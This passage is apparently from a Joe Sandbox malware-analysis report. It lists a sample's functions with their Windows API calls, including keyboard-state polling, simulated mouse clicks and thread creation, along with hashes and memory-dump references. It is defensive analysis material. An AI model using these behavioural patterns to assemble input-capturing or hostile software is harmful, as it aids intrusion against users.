                                                                                                                                        • Opcode Fuzzy Hash: fbceade026a981a90505247f8634f1a745ba53545bee427ed7abceb528f6a51d
                                                                                                                                        • Instruction Fuzzy Hash: B741D275900144ABDB36DFA8CC89FA9BB79EB09320F15426DF91DEB2D1C738AD01D660
                                                                                                                                        Function 007B1726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007B17D4
                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007B17FD
                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007B183C
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007B1861
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007B1869
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1389676194-0
                                                                                                                                        • Opcode ID: 150cf49499b9a6079fc6e7dbe165075f11f7879f0542f64c41015769d95a7fa2
                                                                                                                                        • Instruction ID: f77189c07d0f8d3f3dd930ba9744a29c13dade0f06454e8aa974d1c84328a9b8
                                                                                                                                        • Opcode Fuzzy Hash: 150cf49499b9a6079fc6e7dbe165075f11f7879f0542f64c41015769d95a7fa2
                                                                                                                                        • Instruction Fuzzy Hash: 95413A35A00205DFCB11EF64C995AADBBF5FF48310B148099E90AAF361DB39ED01CBA1
                                                                                                                                        Function 0077B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32(000000FF), ref: 0077B749
                                                                                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 0077B766
                                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 0077B78B
                                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 0077B799
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4210589936-0
                                                                                                                                        • Opcode ID: 4f431734d860c53e9bae62de53e844d5f5f2b7ed13f168825d315bfd3901407d
                                                                                                                                        • Instruction ID: c8f71600dd681d18244689b0d77302e701dea4a9e82add5e3669275d853490c5
                                                                                                                                        • Opcode Fuzzy Hash: 4f431734d860c53e9bae62de53e844d5f5f2b7ed13f168825d315bfd3901407d
                                                                                                                                        • Instruction Fuzzy Hash: 24415135504219FFDF199F64C888FEABB74BB55360F10835AF82996290C738AD50DBA1
                                                                                                                                        Function 0079C145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0079C156
                                                                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 0079C200
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0079C208
                                                                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 0079C216
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0079C21E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3382505437-0
                                                                                                                                        • Opcode ID: c61e1b8595b4c1e4e8b8061e0e04b443f7e9fd38565ae90dcbf4f62f7ee08e73
                                                                                                                                        • Instruction ID: ac9de02f8c9fc878a98be501b4ac91c54b7176808e71326e6375bda1ef1ea1ea
                                                                                                                                        • Opcode Fuzzy Hash: c61e1b8595b4c1e4e8b8061e0e04b443f7e9fd38565ae90dcbf4f62f7ee08e73
                                                                                                                                        • Instruction Fuzzy Hash: 1431BFB150021DEBDF14CFA8ED4DA9E3BB5EB04315F104215F920AA1D1C7B89D04CB94
                                                                                                                                        Function 0079E9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0079E9CD
                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0079E9EA
                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0079EA22
                                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0079EA48
                                                                                                                                        • _wcsstr.LIBCMT ref: 0079EA52
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3902887630-0
                                                                                                                                        • Opcode ID: 5ece3fababcbc7c4316ccc5f36ff0e4532e7b547f5ae86b28ef8418ffebe774e
                                                                                                                                        • Instruction ID: 4e90b1777f651628aee7dcb362c1d10091e9b3ad6e9101df877a83217c9860b5
                                                                                                                                        • Opcode Fuzzy Hash: 5ece3fababcbc7c4316ccc5f36ff0e4532e7b547f5ae86b28ef8418ffebe774e
                                                                                                                                        • Instruction Fuzzy Hash: 6521DA71604244BAEF25EB65AC4DE7F7BA8EF49760F10C029F809CA1A1DA69DC419790
                                                                                                                                        Function 007CDC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007CDCC0
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007CDCE4
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007CDCFC
                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 007CDD24
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,007B407D,00000000), ref: 007CDD42
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2294984445-0
                                                                                                                                        • Opcode ID: 6f8ae595726a8d5023382a6d4409ed2503ec4229d073571990f360b17e707119
                                                                                                                                        • Instruction ID: 0d9d0225fc32f8c67cf240bb1991673e6da57068761db9dc53b1574a4e3651f8
                                                                                                                                        • Opcode Fuzzy Hash: 6f8ae595726a8d5023382a6d4409ed2503ec4229d073571990f360b17e707119
                                                                                                                                        • Instruction Fuzzy Hash: D421AE71A00252AFCB305F789C88F6937A5FB5A364F20473EF926CA1E0D3749C11CA90
                                                                                                                                        Function 0079CA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0079CA86
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0079CAB8
                                                                                                                                        • __itow.LIBCMT ref: 0079CAD0
                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0079CAF6
                                                                                                                                        • __itow.LIBCMT ref: 0079CB07
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$__itow$_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2983881199-0
                                                                                                                                        • Opcode ID: bf20033dfd67db15e4b6276474f8a9e333893b24a52cfc372663374a0aef51aa
                                                                                                                                        • Instruction ID: a349c9ac5b2cc48de4cd962cc0d2a2d108f953a0d9283e9a7466cc6c07e934f3
                                                                                                                                        • Opcode Fuzzy Hash: bf20033dfd67db15e4b6276474f8a9e333893b24a52cfc372663374a0aef51aa
                                                                                                                                        • Instruction Fuzzy Hash: C121C6B2701208BBDF26EAA5AC4BEDE7B69EF49750F104024FD06E7181D6798D4587A0
                                                                                                                                        Function 007B89AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • IsWindow.USER32(00000000), ref: 007B89CE
                                                                                                                                        • GetForegroundWindow.USER32 ref: 007B89E5
                                                                                                                                        • GetDC.USER32(00000000), ref: 007B8A21
                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 007B8A2D
                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 007B8A68
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                        • Opcode ID: 235df911f6ed618c071f80da8d997bf0f8451170308c90c6879dc9183af22502
                                                                                                                                        • Instruction ID: f406a4cd676c81812b0362fd4a4e92d312397aa9298c85d28ba9bbc1d17f73b1
                                                                                                                                        • Opcode Fuzzy Hash: 235df911f6ed618c071f80da8d997bf0f8451170308c90c6879dc9183af22502
                                                                                                                                        • Instruction Fuzzy Hash: 01216F75A00204EFDB10EF65CC89AAA7BF9EF48341F04C479E94A9B352DB78AD44CB51
                                                                                                                                        Function 0077B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0077B5EB
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0077B5FA
                                                                                                                                        • BeginPath.GDI32(?), ref: 0077B611
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0077B63B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3225163088-0
                                                                                                                                        • Opcode ID: bb9150f428af204551782dd1703dd5e25017ab7efa8980d23d29e907ec1255a5
                                                                                                                                        • Instruction ID: 76c013033bb5954639f6a0b56e4d6c5f3bb585eb001285dab9bae66428ba4318
                                                                                                                                        • Opcode Fuzzy Hash: bb9150f428af204551782dd1703dd5e25017ab7efa8980d23d29e907ec1255a5
                                                                                                                                        • Instruction Fuzzy Hash: C5215E70800349EFDF209F25ECC87A97BE9FB25395F24C13AE919961A0D3789992CB54
                                                                                                                                        Function 00782E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __calloc_crt.LIBCMT ref: 00782E81
                                                                                                                                        • CreateThread.KERNEL32(?,?,00782FB7,00000000,?,?), ref: 00782EC5
                                                                                                                                        • GetLastError.KERNEL32 ref: 00782ECF
                                                                                                                                        • _free.LIBCMT ref: 00782ED8
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00782EE3
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2664167353-0
                                                                                                                                        • Opcode ID: 7abed7817d51d958e0707910ee9d9b7d1997b9777a673a159f73e977bcdd254e
                                                                                                                                        • Instruction ID: 23053470037e8512a3e8292b427a45b0a3444a22f0162651844b56c36a572f01
                                                                                                                                        • Opcode Fuzzy Hash: 7abed7817d51d958e0707910ee9d9b7d1997b9777a673a159f73e977bcdd254e
                                                                                                                                        • Instruction Fuzzy Hash: 9B112B32184305EFD720BFA5DC49D6B7BA8EF04770B100029FA14C6153EF39C8028765
                                                                                                                                        Function 0079B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0079B903
                                                                                                                                        • GetLastError.KERNEL32(?,0079B3CB,?,?,?), ref: 0079B90D
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,0079B3CB,?,?,?), ref: 0079B91C
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,0079B3CB), ref: 0079B923
                                                                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0079B93A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 883493501-0
                                                                                                                                        • Opcode ID: 508bdf9ad4da191747e11c007f3a24c30e56b1f89028a641b7e196026f68405b
                                                                                                                                        • Instruction ID: 1319ea354ca2b6f00189bbdbcecd50be2a0574f04d331fc7fc5cb552f42c8b52
                                                                                                                                        • Opcode Fuzzy Hash: 508bdf9ad4da191747e11c007f3a24c30e56b1f89028a641b7e196026f68405b
                                                                                                                                        • Instruction Fuzzy Hash: 7F016D71212258BFDF214FA9EC88D6B3BAEEF8A764B104029F545CA150DB799C40DA60
                                                                                                                                        Function 007A8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007A8371
                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007A837F
                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007A8387
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007A8391
                                                                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007A83CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2833360925-0
                                                                                                                                        • Opcode ID: f7069cafb1996a6f0892cc83e40ffbed63dbcf7698f5c7d7d9ea2f0f5a5b8d0d
                                                                                                                                        • Instruction ID: cae742b1e3a9492fc053a035292a90253d1bf89f44e49eede5170e4b05f89d90
                                                                                                                                        • Opcode Fuzzy Hash: f7069cafb1996a6f0892cc83e40ffbed63dbcf7698f5c7d7d9ea2f0f5a5b8d0d
                                                                                                                                        • Instruction Fuzzy Hash: DA016971C0261DDBCF10AFA4EC88AEEBB78FF4DB01F014551E501B2140DF78996487A6
                                                                                                                                        Function 0079A857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CLSIDFromProgID.COMBASE ref: 0079A874
                                                                                                                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 0079A88F
                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 0079A89D
                                                                                                                                        • CoTaskMemFree.COMBASE(00000000), ref: 0079A8AD
                                                                                                                                        • CLSIDFromString.COMBASE(?,?), ref: 0079A8B9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3897988419-0
                                                                                                                                        • Opcode ID: e9e48effbffa7ada5145eca6afcacf31b0eb6329b1fc5e4ca374eec2841a8f7f
                                                                                                                                        • Instruction ID: 26178f9f6a55b22548d090b69daa1ba3f5139cb9c9532c358743f461b2543bf1
                                                                                                                                        • Opcode Fuzzy Hash: e9e48effbffa7ada5145eca6afcacf31b0eb6329b1fc5e4ca374eec2841a8f7f
